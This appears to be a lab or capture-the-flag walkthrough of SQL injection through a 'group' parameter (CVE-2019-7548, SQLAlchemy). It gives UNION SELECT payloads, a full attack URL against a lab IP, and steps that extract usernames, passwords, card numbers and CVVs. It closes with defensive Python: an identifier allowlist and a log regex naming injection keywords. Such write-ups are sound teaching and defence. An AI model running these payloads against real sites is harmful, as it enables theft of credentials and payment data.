IML - CVE-2019-7548 (SQLAlchemy)

CVE-2019-7548 (SQLAlchemy) - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.



image1

  • First, we can see that there is a parameter that might be vulnerable to SQL injection (SQLi)

  • To test it, we can insert a single quote (') to break the query

image2

  • From here I use an ORDER BY query to find out how many columns the table has (trial and error)
  • It errors at 9, so the query returns 8 columns

image3

  • Now we can do union select 1,2,3,4,5,6,7,8 because a UNION has to return the same number of columns as the original SELECT
  • It was trial and error to find where the values were being reflected, but I found it on the last page (221)

image4

  • Now we know where it is being reflected, we can get some information

  • First find the type of DB and version:

union select 1,2,3,4,5,6,7,@@version

image5

image6

  • Answering the questions:

image7

  • First let's get the database name; because it's MariaDB we use:

database()

image8

image9

  • We can now enumerate the tables with:
union select 1,2,3,4,5,6,7,group_concat(table_name) from information_schema.tables where table_schema="website"

image10

image11

  • From here we get the tables transactions and users

  • First let's enumerate the columns of the table users:

union select 1,2,3,4,5,6,7,group_concat(column_name) from information_schema.columns where table_name="users"

image12

image13

  • Here we get the columns id,firstName,lastName,country,username,email,password,cardNumber,cardIssuer,cardExpiry,cardCVV

  • To read the columns we do:

union select 1,2,3,4,5,6,7,group_concat(username,0x2b,password) from users

This will read and concatenate the two columns username and password. The 0x2b (the ASCII code for '+') is a delimiter between the two values so that the output is easier to read

image14

image15

  • To narrow it down do:
union select 1,2,3,4,5,6,7,group_concat(username,0x2b,password) from users where username="ywalsh"

image16

image17

  • Use the following:
union select 1,2,3,4,5,6,7,group_concat(firstName,lastName,0x2b,cardNumber) from users where lastname="Park" and firstName="Shelly"

image18

  • Use the following:
union select 1,2,3,4,5,6,7,group_concat(firstName,lastName,0x2b,cardCVV) from users where lastname="Elliott" and firstName="John"

image19

image20

The full URL for this is:

http://10.102.16.9/?page=221&group=email%20union%20select%201,2,3,4,5,6,7,group_concat(firstName,lastName,0x2b,cardCVV)%20from%20users%20where%20lastname=%22Elliott%22%20and%20firstName=%22John%22
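As an added illustration (this is not code from the lab or from the SQLAlchemy project), here is the defensive side of the group parameter abused above: an allowlist check that rejects anything other than a known column name before it is interpolated into the query, and a small log check that flags the request pattern visible in the full URL. The allowlisted column names, the in-memory SQLite table, the log line format and the sample log lines are all constructed for this example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed allowlist of columns a client may group by. Assumption: the
# lab's real handler is not available; these names are taken from the column
# list enumerated in the walkthrough and are used only for illustration.
ALLOWED_GROUP_COLUMNS = frozenset({"email", "country", "cardIssuer"})

# Constructed sample rows for an in-memory "users" table (not lab data).
SAMPLE_ROWS = [
    ("alice@example.test", "UK"),
    ("bob@example.test", "UK"),
    ("carol@example.test", "US"),
]


def is_allowed_group_column(group_col: str) -> bool:
    """True only for a literal column name from the fixed allowlist."""
    return group_col in ALLOWED_GROUP_COLUMNS


def build_group_query(group_col: str) -> str:
    """Return a GROUP BY query only for an allowlisted identifier.

    The weakness behind the lab is interpolating the raw ``group`` request
    parameter into the query text. Checking it against a fixed set of column
    names first means a value such as ``email union select ...`` is refused
    before it ever reaches the database driver.
    """
    if not is_allowed_group_column(group_col):
        raise ValueError(f"group column not permitted: {group_col!r}")
    # Safe to interpolate: the value is one of our own literal column names.
    return (
        f"SELECT {group_col}, COUNT(*) FROM users "
        f"GROUP BY {group_col} ORDER BY {group_col}"
    )


def run_group_query(group_col: str) -> list:
    """Run the validated query against a constructed in-memory SQLite table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, country TEXT, cardIssuer TEXT)")
    conn.executemany("INSERT INTO users (email, country) VALUES (?, ?)", SAMPLE_ROWS)
    rows = conn.execute(build_group_query(group_col)).fetchall()
    conn.close()
    return rows


# Substrings that characterise the UNION-based enumeration shown in the
# walkthrough; matched after URL-decoding so %20 encoding does not hide them.
SQLI_PATTERNS = re.compile(
    r"\bunion\s+select\b|information_schema|@@version|group_concat\(",
    re.IGNORECASE,
)


def flag_sqli_requests(log_lines: list) -> list:
    """Return (client_ip, decoded_request_target) for suspicious log lines.

    Assumes a common-log-format style line in which the request target is the
    7th whitespace-separated field (constructed format for this example).
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 7:
            continue
        target = unquote_plus(parts[6])
        if SQLI_PATTERNS.search(target):
            hits.append((parts[0], target))
    return hits


# Constructed sample log lines (not taken from the lab).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=1&group=email HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=221&group=email%20union%20select%201,2,3,4,5,6,7,@@version HTTP/1.1" 200 640',
]


if __name__ == "__main__":
    print(run_group_query("country"))
    for ip, target in flag_sqli_requests(SAMPLE_LOG):
        print(f"suspicious request from {ip}: {target}")
```

The allowlist is the important part: escaping or quoting does not help here, because a GROUP BY column is an identifier, not a string value, so the only safe approach is to accept nothing but names you chose yourself. The log check is a coarse first filter for triage, not a substitute for fixing the handler.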

This post is licensed under CC BY 4.0 by the author.